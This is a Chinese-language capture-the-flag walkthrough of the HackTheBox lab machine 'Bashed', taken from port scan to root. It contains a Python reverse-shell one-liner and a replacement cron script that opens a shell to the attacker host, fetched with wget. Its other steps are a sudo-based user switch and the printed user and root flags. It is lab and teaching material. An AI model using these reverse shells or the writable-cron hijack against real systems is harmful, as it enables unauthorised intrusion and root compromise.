目录
连接至HTB服务器并启动靶机
1.How many open TCP ports are listening on Bashed?
2.What is the relative path on the webserver to a folder that contains phpbash.php?
3.What user is the webserver running as on Bashed?
执行命令:whoami
4.Submit the flag located in the arrexel user's home directory.
USER_FLAG:cbe6de5b0feafc1ab51318e2ee21537f
5.www-data can run any command as a user without a password. What is that user's username?
6.What folder in the system root can scriptmanager access that www-data could not?
Payload
7.What is filename of the file that is being run by root every couple minutes?
查看test.py文件内容
8.Submit the flag located in root's home directory.
ROOT_FLAG:291ef33b4e52533112fc62ee76664fad
连接至HTB服务器并启动靶机
靶机IP:10.10.10.68
分配IP:10.10.16.6
1.How many open TCP ports are listening on Bashed?
使用nmap对靶机进行端口扫描
nmap -p- -T4 --min-rate=1500 -sS -Pn {TARGET_IP}┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- -T4 --min-rate=1500 -sS -Pn 10.10.10.68
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 00:12 EDT
Nmap scan report for 10.10.10.68
Host is up (0.096s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 29.52 seconds
由扫描结果可见,靶机开放端口:80共1个端口
2.What is the relative path on the webserver to a folder that contains phpbash.php?
在靶机主页面中,可以找到phpbash的相关博客
使用ffuf对靶机进行路径FUZZ,找到phpbash的位置
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ffuf -u http://10.10.10.68/FUZZ/phpbash.php -w ../dictionary/common.txt/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/v2.1.0-dev
________________________________________________:: Method : GET
:: URL : http://10.10.10.68/FUZZ/phpbash.php
:: Wordlist : FUZZ: /home/kali/Desktop/dictionary/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________.hta [Status: 403, Size: 302, Words: 22, Lines: 12, Duration: 144ms]
.htpasswd [Status: 403, Size: 307, Words: 22, Lines: 12, Duration: 144ms]
.htaccess [Status: 403, Size: 307, Words: 22, Lines: 12, Duration: 169ms]
dev [Status: 200, Size: 8151, Words: 3407, Lines: 216, Duration: 70ms]
server-status [Status: 403, Size: 311, Words: 22, Lines: 12, Duration: 72ms]
:: Progress: [4614/4614] :: Job [1/1] :: 415 req/sec :: Duration: [0:00:09] :: Errors: 0 ::
由输出可见,当在路径/dev时,靶机响应状态码为200
3.What user is the webserver running as on Bashed?
直接访问该文件:http://{TARGET_IP}/dev/phpbash.php
执行命令:whoami
由回显可见,运行该Web服务器的用户为:www-data
4.Submit the flag located in the arrexel user's home directory.
查找user_flag位置
find / -name 'user.txt'
查看user_flag内容
cat /home/arrexel/user.txtwww-data@bashed
:/var/www/html/dev# cat /home/arrexel/user.txtcbe6de5b0feafc1ab51318e2ee21537f
USER_FLAG:cbe6de5b0feafc1ab51318e2ee21537f
5.www-data can run any command as a user without a password. What is that user's username?
查看当前用户可执行的特权命令
sudo -lwww-data@bashed
:/var/www/html/dev# sudo -lMatching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
由回显可见,当前用户可以作为scriptmanager用户执行所有命令
6.What folder in the system root can scriptmanager access that www-data could not?
利用靶机存在python环境反弹shell
Payload
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{NATIVE_IP}",{NATIVE_PORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
本地侧nc开启监听
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.68] 51118
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
列出根目录下所有文件夹及其权限
$ script /dev/null -c bash
Script started, file is /dev/null
www-data@bashed:/var/www/html/dev$ ls -la /
ls -la /
total 92
drwxr-xr-x 23 root root 4096 Jun 2 2022 .
drwxr-xr-x 23 root root 4096 Jun 2 2022 ..
-rw------- 1 root root 174 Jun 14 2022 .bash_history
drwxr-xr-x 2 root root 4096 Jun 2 2022 bin
drwxr-xr-x 3 root root 4096 Jun 2 2022 boot
drwxr-xr-x 19 root root 4140 Oct 18 20:56 dev
drwxr-xr-x 89 root root 4096 Jun 2 2022 etc
drwxr-xr-x 4 root root 4096 Dec 4 2017 home
lrwxrwxrwx 1 root root 32 Dec 4 2017 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x 19 root root 4096 Dec 4 2017 lib
drwxr-xr-x 2 root root 4096 Jun 2 2022 lib64
drwx------ 2 root root 16384 Dec 4 2017 lost+found
drwxr-xr-x 4 root root 4096 Dec 4 2017 media
drwxr-xr-x 2 root root 4096 Jun 2 2022 mnt
drwxr-xr-x 2 root root 4096 Dec 4 2017 opt
dr-xr-xr-x 174 root root 0 Oct 18 20:56 proc
drwx------ 3 root root 4096 Oct 18 20:57 root
drwxr-xr-x 18 root root 500 Oct 18 20:56 run
drwxr-xr-x 2 root root 4096 Dec 4 2017 sbin
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Jun 2 2022 scripts
drwxr-xr-x 2 root root 4096 Feb 15 2017 srv
dr-xr-xr-x 13 root root 0 Oct 18 22:02 sys
drwxrwxrwt 10 root root 4096 Oct 18 22:29 tmp
drwxr-xr-x 10 root root 4096 Dec 4 2017 usr
drwxr-xr-x 12 root root 4096 Jun 2 2022 var
lrwxrwxrwx 1 root root 29 Dec 4 2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic
由回显可见:/scripts文件夹scriptmanager可以访问而www-data不能
7.What is filename of the file that is being run by root every couple minutes?
直接通过sudo切换到scriptmanager用户
www-data@bashed:/var/spool/cron$ sudo -i -u scriptmanager
sudo -i -u scriptmanager
scriptmanager@bashed:~$ whoami
whoami
scriptmanager
进入/scripts目录下
cd /scripts查看该目录下所有文件及其权限和访问时间
ls -lascriptmanager@bashed:/scripts$ ls -la
ls -la
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Oct 18 23:19 .
drwxr-xr-x 23 root root 4096 Jun 2 2022 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 Oct 18 23:19 test.txt
当我把test.txt文件进行删除后,过了两分钟又会重新生成一个新日期的test.txt
查看test.py文件内容
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
可见该py文件的作用是:打开test.txt并往里写入内容
以此可以确定该test.py文件被root用户包含在了定时任务内
8.Submit the flag located in root's home directory.
在本地写入一个新的test.py文件,利用它传入靶机来反弹shell
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.6",1426));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
将靶机scripts目录下所有文件删除
scriptmanager@bashed:/scripts$ rm test.py test.txt
rm test.py test.txt
rm: remove write-protected regular file 'test.txt'? yes
yes
scriptmanager@bashed:/scripts$ ls
ls
scriptmanager@bashed:/scripts$
将本地test.py上传至靶机
wget http://{NATIVE_IP}:{NATIVE_PORT}/test.py -O test.pyscriptmanager@bashed:/scripts$ wget http://10.10.16.6:6666/test.py -O test.py
wget http://10.10.16.6:6666/test.py -O test.py
--2024-10-18 23:26:42-- http://10.10.16.6:6666/test.py
Connecting to 10.10.16.6:6666... connected.
HTTP request sent, awaiting response... 200 OK
Length: 221 [text/x-python]
Saving to: 'test.py'test.py 100%[===================>] 221 --.-KB/s in 0s
2024-10-18 23:26:42 (70.6 MB/s) - 'test.py' saved [221/221]
scriptmanager@bashed:/scripts$ ls
ls
test.py
赋上777权限,以便root用户拥有足够的权限运行该文件
chmod 777 test.py本地侧nc开启新的端口监听,等待root用户定时任务运行test.py
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1426
listening on [any] 1426 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.68] 55542
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
查找root_flag位置
find / -name 'root.txt'查看root_flag内容
cat /root/root.txt# find / -name 'root.txt'
/root/root.txt
# cat /root/root.txt
291ef33b4e52533112fc62ee76664fad
